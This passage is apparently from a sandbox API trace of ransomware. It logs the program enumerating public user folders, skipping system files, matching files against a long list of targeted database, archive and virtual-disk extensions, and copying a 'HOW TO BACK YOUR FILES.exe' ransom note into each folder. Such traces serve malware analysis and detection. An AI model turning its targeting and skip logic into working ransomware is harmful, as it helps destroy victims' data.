lpString2="db-wal") returned -1 [0039.913] lstrlenW (lpString="dbc") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0039.913] lstrlenW (lpString="dbs") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0039.913] lstrlenW (lpString="dbt") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0039.913] lstrlenW (lpString="dbv") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0039.913] lstrlenW (lpString="dbx") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0039.913] lstrlenW (lpString="dcb") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0039.914] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0039.914] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="aoldtz.exe") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="..") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="windows") returned -1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="bootmgr") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="temp") returned -1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="pagefile.sys") returned -1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="boot") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="ids.txt") returned 1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="ntuser.dat") returned -1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="perflogs") returned -1 [0039.914] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="MSBuild") returned -1 [0039.914] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0039.914] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 55 [0039.914] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0039.914] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0039.914] lstrlenW (lpString="Ares865") returned 7 [0039.914] lstrcmpiW (lpString1="ish.jpg", lpString2="Ares865") returned 1 [0039.914] lstrlenW (lpString=".dll") returned 4 [0039.915] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".dll") returned 1 [0039.915] lstrlenW (lpString=".lnk") returned 4 [0039.915] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".lnk") returned 1 [0039.915] lstrlenW (lpString=".ini") returned 4 [0039.915] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".ini") returned 1 [0039.915] lstrlenW (lpString=".sys") returned 4 [0039.915] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".sys") returned 1 [0039.915] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0039.915] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="aoldtz.exe") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2=".") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="..") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="windows") returned -1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="bootmgr") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="temp") returned -1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="pagefile.sys") returned -1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="boot") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="ids.txt") returned 1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="ntuser.dat") returned -1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="perflogs") returned -1 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2="MSBuild") returned -1 [0039.915] lstrlenW (lpString="Koala.jpg") returned 9 [0039.915] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 54 [0039.915] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0039.915] lstrlenW (lpString="Koala.jpg") returned 9 [0039.915] lstrlenW (lpString="Ares865") returned 7 [0039.915] lstrcmpiW (lpString1="ala.jpg", lpString2="Ares865") returned -1 [0039.915] lstrlenW (lpString=".dll") returned 4 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2=".dll") returned 1 [0039.915] lstrlenW (lpString=".lnk") returned 4 [0039.915] lstrcmpiW (lpString1="Koala.jpg", lpString2=".lnk") returned 1 [0039.916] lstrlenW (lpString=".ini") returned 4 [0039.916] lstrcmpiW (lpString1="Koala.jpg", lpString2=".ini") returned 1 [0039.916] lstrlenW (lpString=".sys") returned 4 [0039.916] lstrcmpiW (lpString1="Koala.jpg", lpString2=".sys") returned 1 [0039.916] lstrlenW (lpString="Koala.jpg") returned 9 [0039.916] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="aoldtz.exe") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="..") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="windows") returned -1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="bootmgr") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="temp") returned -1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="pagefile.sys") returned -1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="boot") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="ids.txt") returned 1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="ntuser.dat") returned -1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="perflogs") returned -1 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="MSBuild") returned -1 [0039.916] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0039.916] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 50 [0039.916] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0039.916] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0039.916] lstrlenW (lpString="Ares865") returned 7 [0039.916] lstrcmpiW (lpString1="use.jpg", lpString2="Ares865") returned 1 [0039.916] lstrlenW (lpString=".dll") returned 4 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".dll") returned 1 [0039.916] lstrlenW (lpString=".lnk") returned 4 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".lnk") returned 1 [0039.916] lstrlenW (lpString=".ini") returned 4 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".ini") returned 1 [0039.916] lstrlenW (lpString=".sys") returned 4 [0039.916] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".sys") returned 1 [0039.917] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0039.917] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="aoldtz.exe") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="..") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="windows") returned -1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="bootmgr") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="temp") returned -1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="pagefile.sys") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="boot") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="ids.txt") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="ntuser.dat") returned 1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="perflogs") returned -1 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2="MSBuild") returned 1 [0039.917] lstrlenW (lpString="Penguins.jpg") returned 12 [0039.917] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 55 [0039.917] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0039.917] lstrlenW (lpString="Penguins.jpg") returned 12 [0039.917] lstrlenW (lpString="Ares865") returned 7 [0039.917] lstrcmpiW (lpString1="ins.jpg", lpString2="Ares865") returned 1 [0039.917] lstrlenW (lpString=".dll") returned 4 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".dll") returned 1 [0039.917] lstrlenW (lpString=".lnk") returned 4 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".lnk") returned 1 [0039.917] lstrlenW (lpString=".ini") returned 4 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".ini") returned 1 [0039.917] lstrlenW (lpString=".sys") returned 4 [0039.917] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".sys") returned 1 [0039.917] lstrlenW (lpString="Penguins.jpg") returned 12 [0039.917] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="aoldtz.exe") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="..") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="windows") returned -1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="bootmgr") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="temp") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="pagefile.sys") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="boot") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="ids.txt") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="ntuser.dat") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="perflogs") returned 1 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2="MSBuild") returned 1 [0039.918] lstrlenW (lpString="Tulips.jpg") returned 10 [0039.918] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 53 [0039.918] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0039.918] lstrlenW (lpString="Tulips.jpg") returned 10 [0039.918] lstrlenW (lpString="Ares865") returned 7 [0039.918] lstrcmpiW (lpString1="ips.jpg", lpString2="Ares865") returned 1 [0039.918] lstrlenW (lpString=".dll") returned 4 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".dll") returned 1 [0039.918] lstrlenW (lpString=".lnk") returned 4 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".lnk") returned 1 [0039.918] lstrlenW (lpString=".ini") returned 4 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".ini") returned 1 [0039.918] lstrlenW (lpString=".sys") returned 4 [0039.918] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".sys") returned 1 [0039.918] lstrlenW (lpString="Tulips.jpg") returned 10 [0039.918] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0039.918] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0039.919] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22a8 [0039.919] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0039.919] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed100 | out: hHeap=0x2b0000) returned 1 [0039.919] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22a0 | out: hHeap=0x2b0000) returned 1 [0039.919] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0039.919] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0039.919] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.919] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\music\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.923] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.923] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0039.923] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.923] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.923] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.923] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.924] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.924] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.924] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.924] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.924] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.924] lstrlenW (lpString="desktop.ini") returned 11 [0039.924] lstrlenW (lpString="C:\\Users\\Public\\Music\\*") returned 23 [0039.924] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.924] lstrlenW (lpString="desktop.ini") returned 11 [0039.924] lstrlenW (lpString="Ares865") returned 7 [0039.924] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.924] lstrlenW (lpString=".dll") returned 4 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.924] lstrlenW (lpString=".lnk") returned 4 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.924] lstrlenW (lpString=".ini") returned 4 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.924] lstrlenW (lpString=".sys") returned 4 [0039.924] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.924] lstrlenW (lpString="desktop.ini") returned 11 [0039.924] lstrlenW (lpString="bak") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.925] lstrlenW (lpString="ba_") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.925] lstrlenW (lpString="dbb") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.925] lstrlenW (lpString="vmdk") returned 4 [0039.925] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.925] lstrlenW (lpString="rar") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.925] lstrlenW (lpString="zip") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.925] lstrlenW (lpString="tgz") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.925] lstrlenW (lpString="vbox") returned 4 [0039.925] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.925] lstrlenW (lpString="vdi") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.925] lstrlenW (lpString="vhd") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.925] lstrlenW (lpString="vhdx") returned 4 [0039.925] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.925] lstrlenW (lpString="avhd") returned 4 [0039.925] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.925] lstrlenW (lpString="db") returned 2 [0039.925] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.925] lstrlenW (lpString="db2") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.925] lstrlenW (lpString="db3") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.925] lstrlenW (lpString="dbf") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.925] lstrlenW (lpString="mdf") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.925] lstrlenW (lpString="mdb") returned 3 [0039.925] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.926] lstrlenW (lpString="sql") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.926] lstrlenW (lpString="sqlite") returned 6 [0039.926] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.926] lstrlenW (lpString="sqlite3") returned 7 [0039.926] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.926] lstrlenW (lpString="sqlitedb") returned 8 [0039.926] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.926] lstrlenW (lpString="xml") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.926] lstrlenW (lpString="$er") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.926] lstrlenW (lpString="4dd") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.926] lstrlenW (lpString="4dl") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.926] lstrlenW (lpString="^^^") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.926] lstrlenW (lpString="abs") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.926] lstrlenW (lpString="abx") returned 3 [0039.926] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.926] lstrlenW (lpString="accdb") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.926] lstrlenW (lpString="accdc") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.926] lstrlenW (lpString="accde") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.926] lstrlenW (lpString="accdr") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.926] lstrlenW (lpString="accdt") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.926] lstrlenW (lpString="accdw") returned 5 [0039.926] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.927] lstrlenW (lpString="accft") returned 5 [0039.927] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.927] lstrlenW (lpString="adb") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.927] lstrlenW (lpString="adb") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.927] lstrlenW (lpString="ade") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.927] lstrlenW (lpString="adf") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.927] lstrlenW (lpString="adn") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.927] lstrlenW (lpString="adp") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.927] lstrlenW (lpString="alf") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.927] lstrlenW (lpString="ask") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.927] lstrlenW (lpString="btr") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.927] lstrlenW (lpString="cat") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.927] lstrlenW (lpString="cdb") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.927] lstrlenW (lpString="ckp") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.927] lstrlenW (lpString="cma") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.927] lstrlenW (lpString="cpd") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.927] lstrlenW (lpString="dacpac") returned 6 [0039.927] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.927] lstrlenW (lpString="dad") returned 3 [0039.927] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.928] lstrlenW (lpString="dadiagrams") returned 10 [0039.928] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.928] lstrlenW (lpString="daschema") returned 8 [0039.928] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.928] lstrlenW (lpString="db-journal") returned 10 [0039.928] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.928] lstrlenW (lpString="db-shm") returned 6 [0039.928] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.928] lstrlenW (lpString="db-wal") returned 6 [0039.928] lstrcmpiW 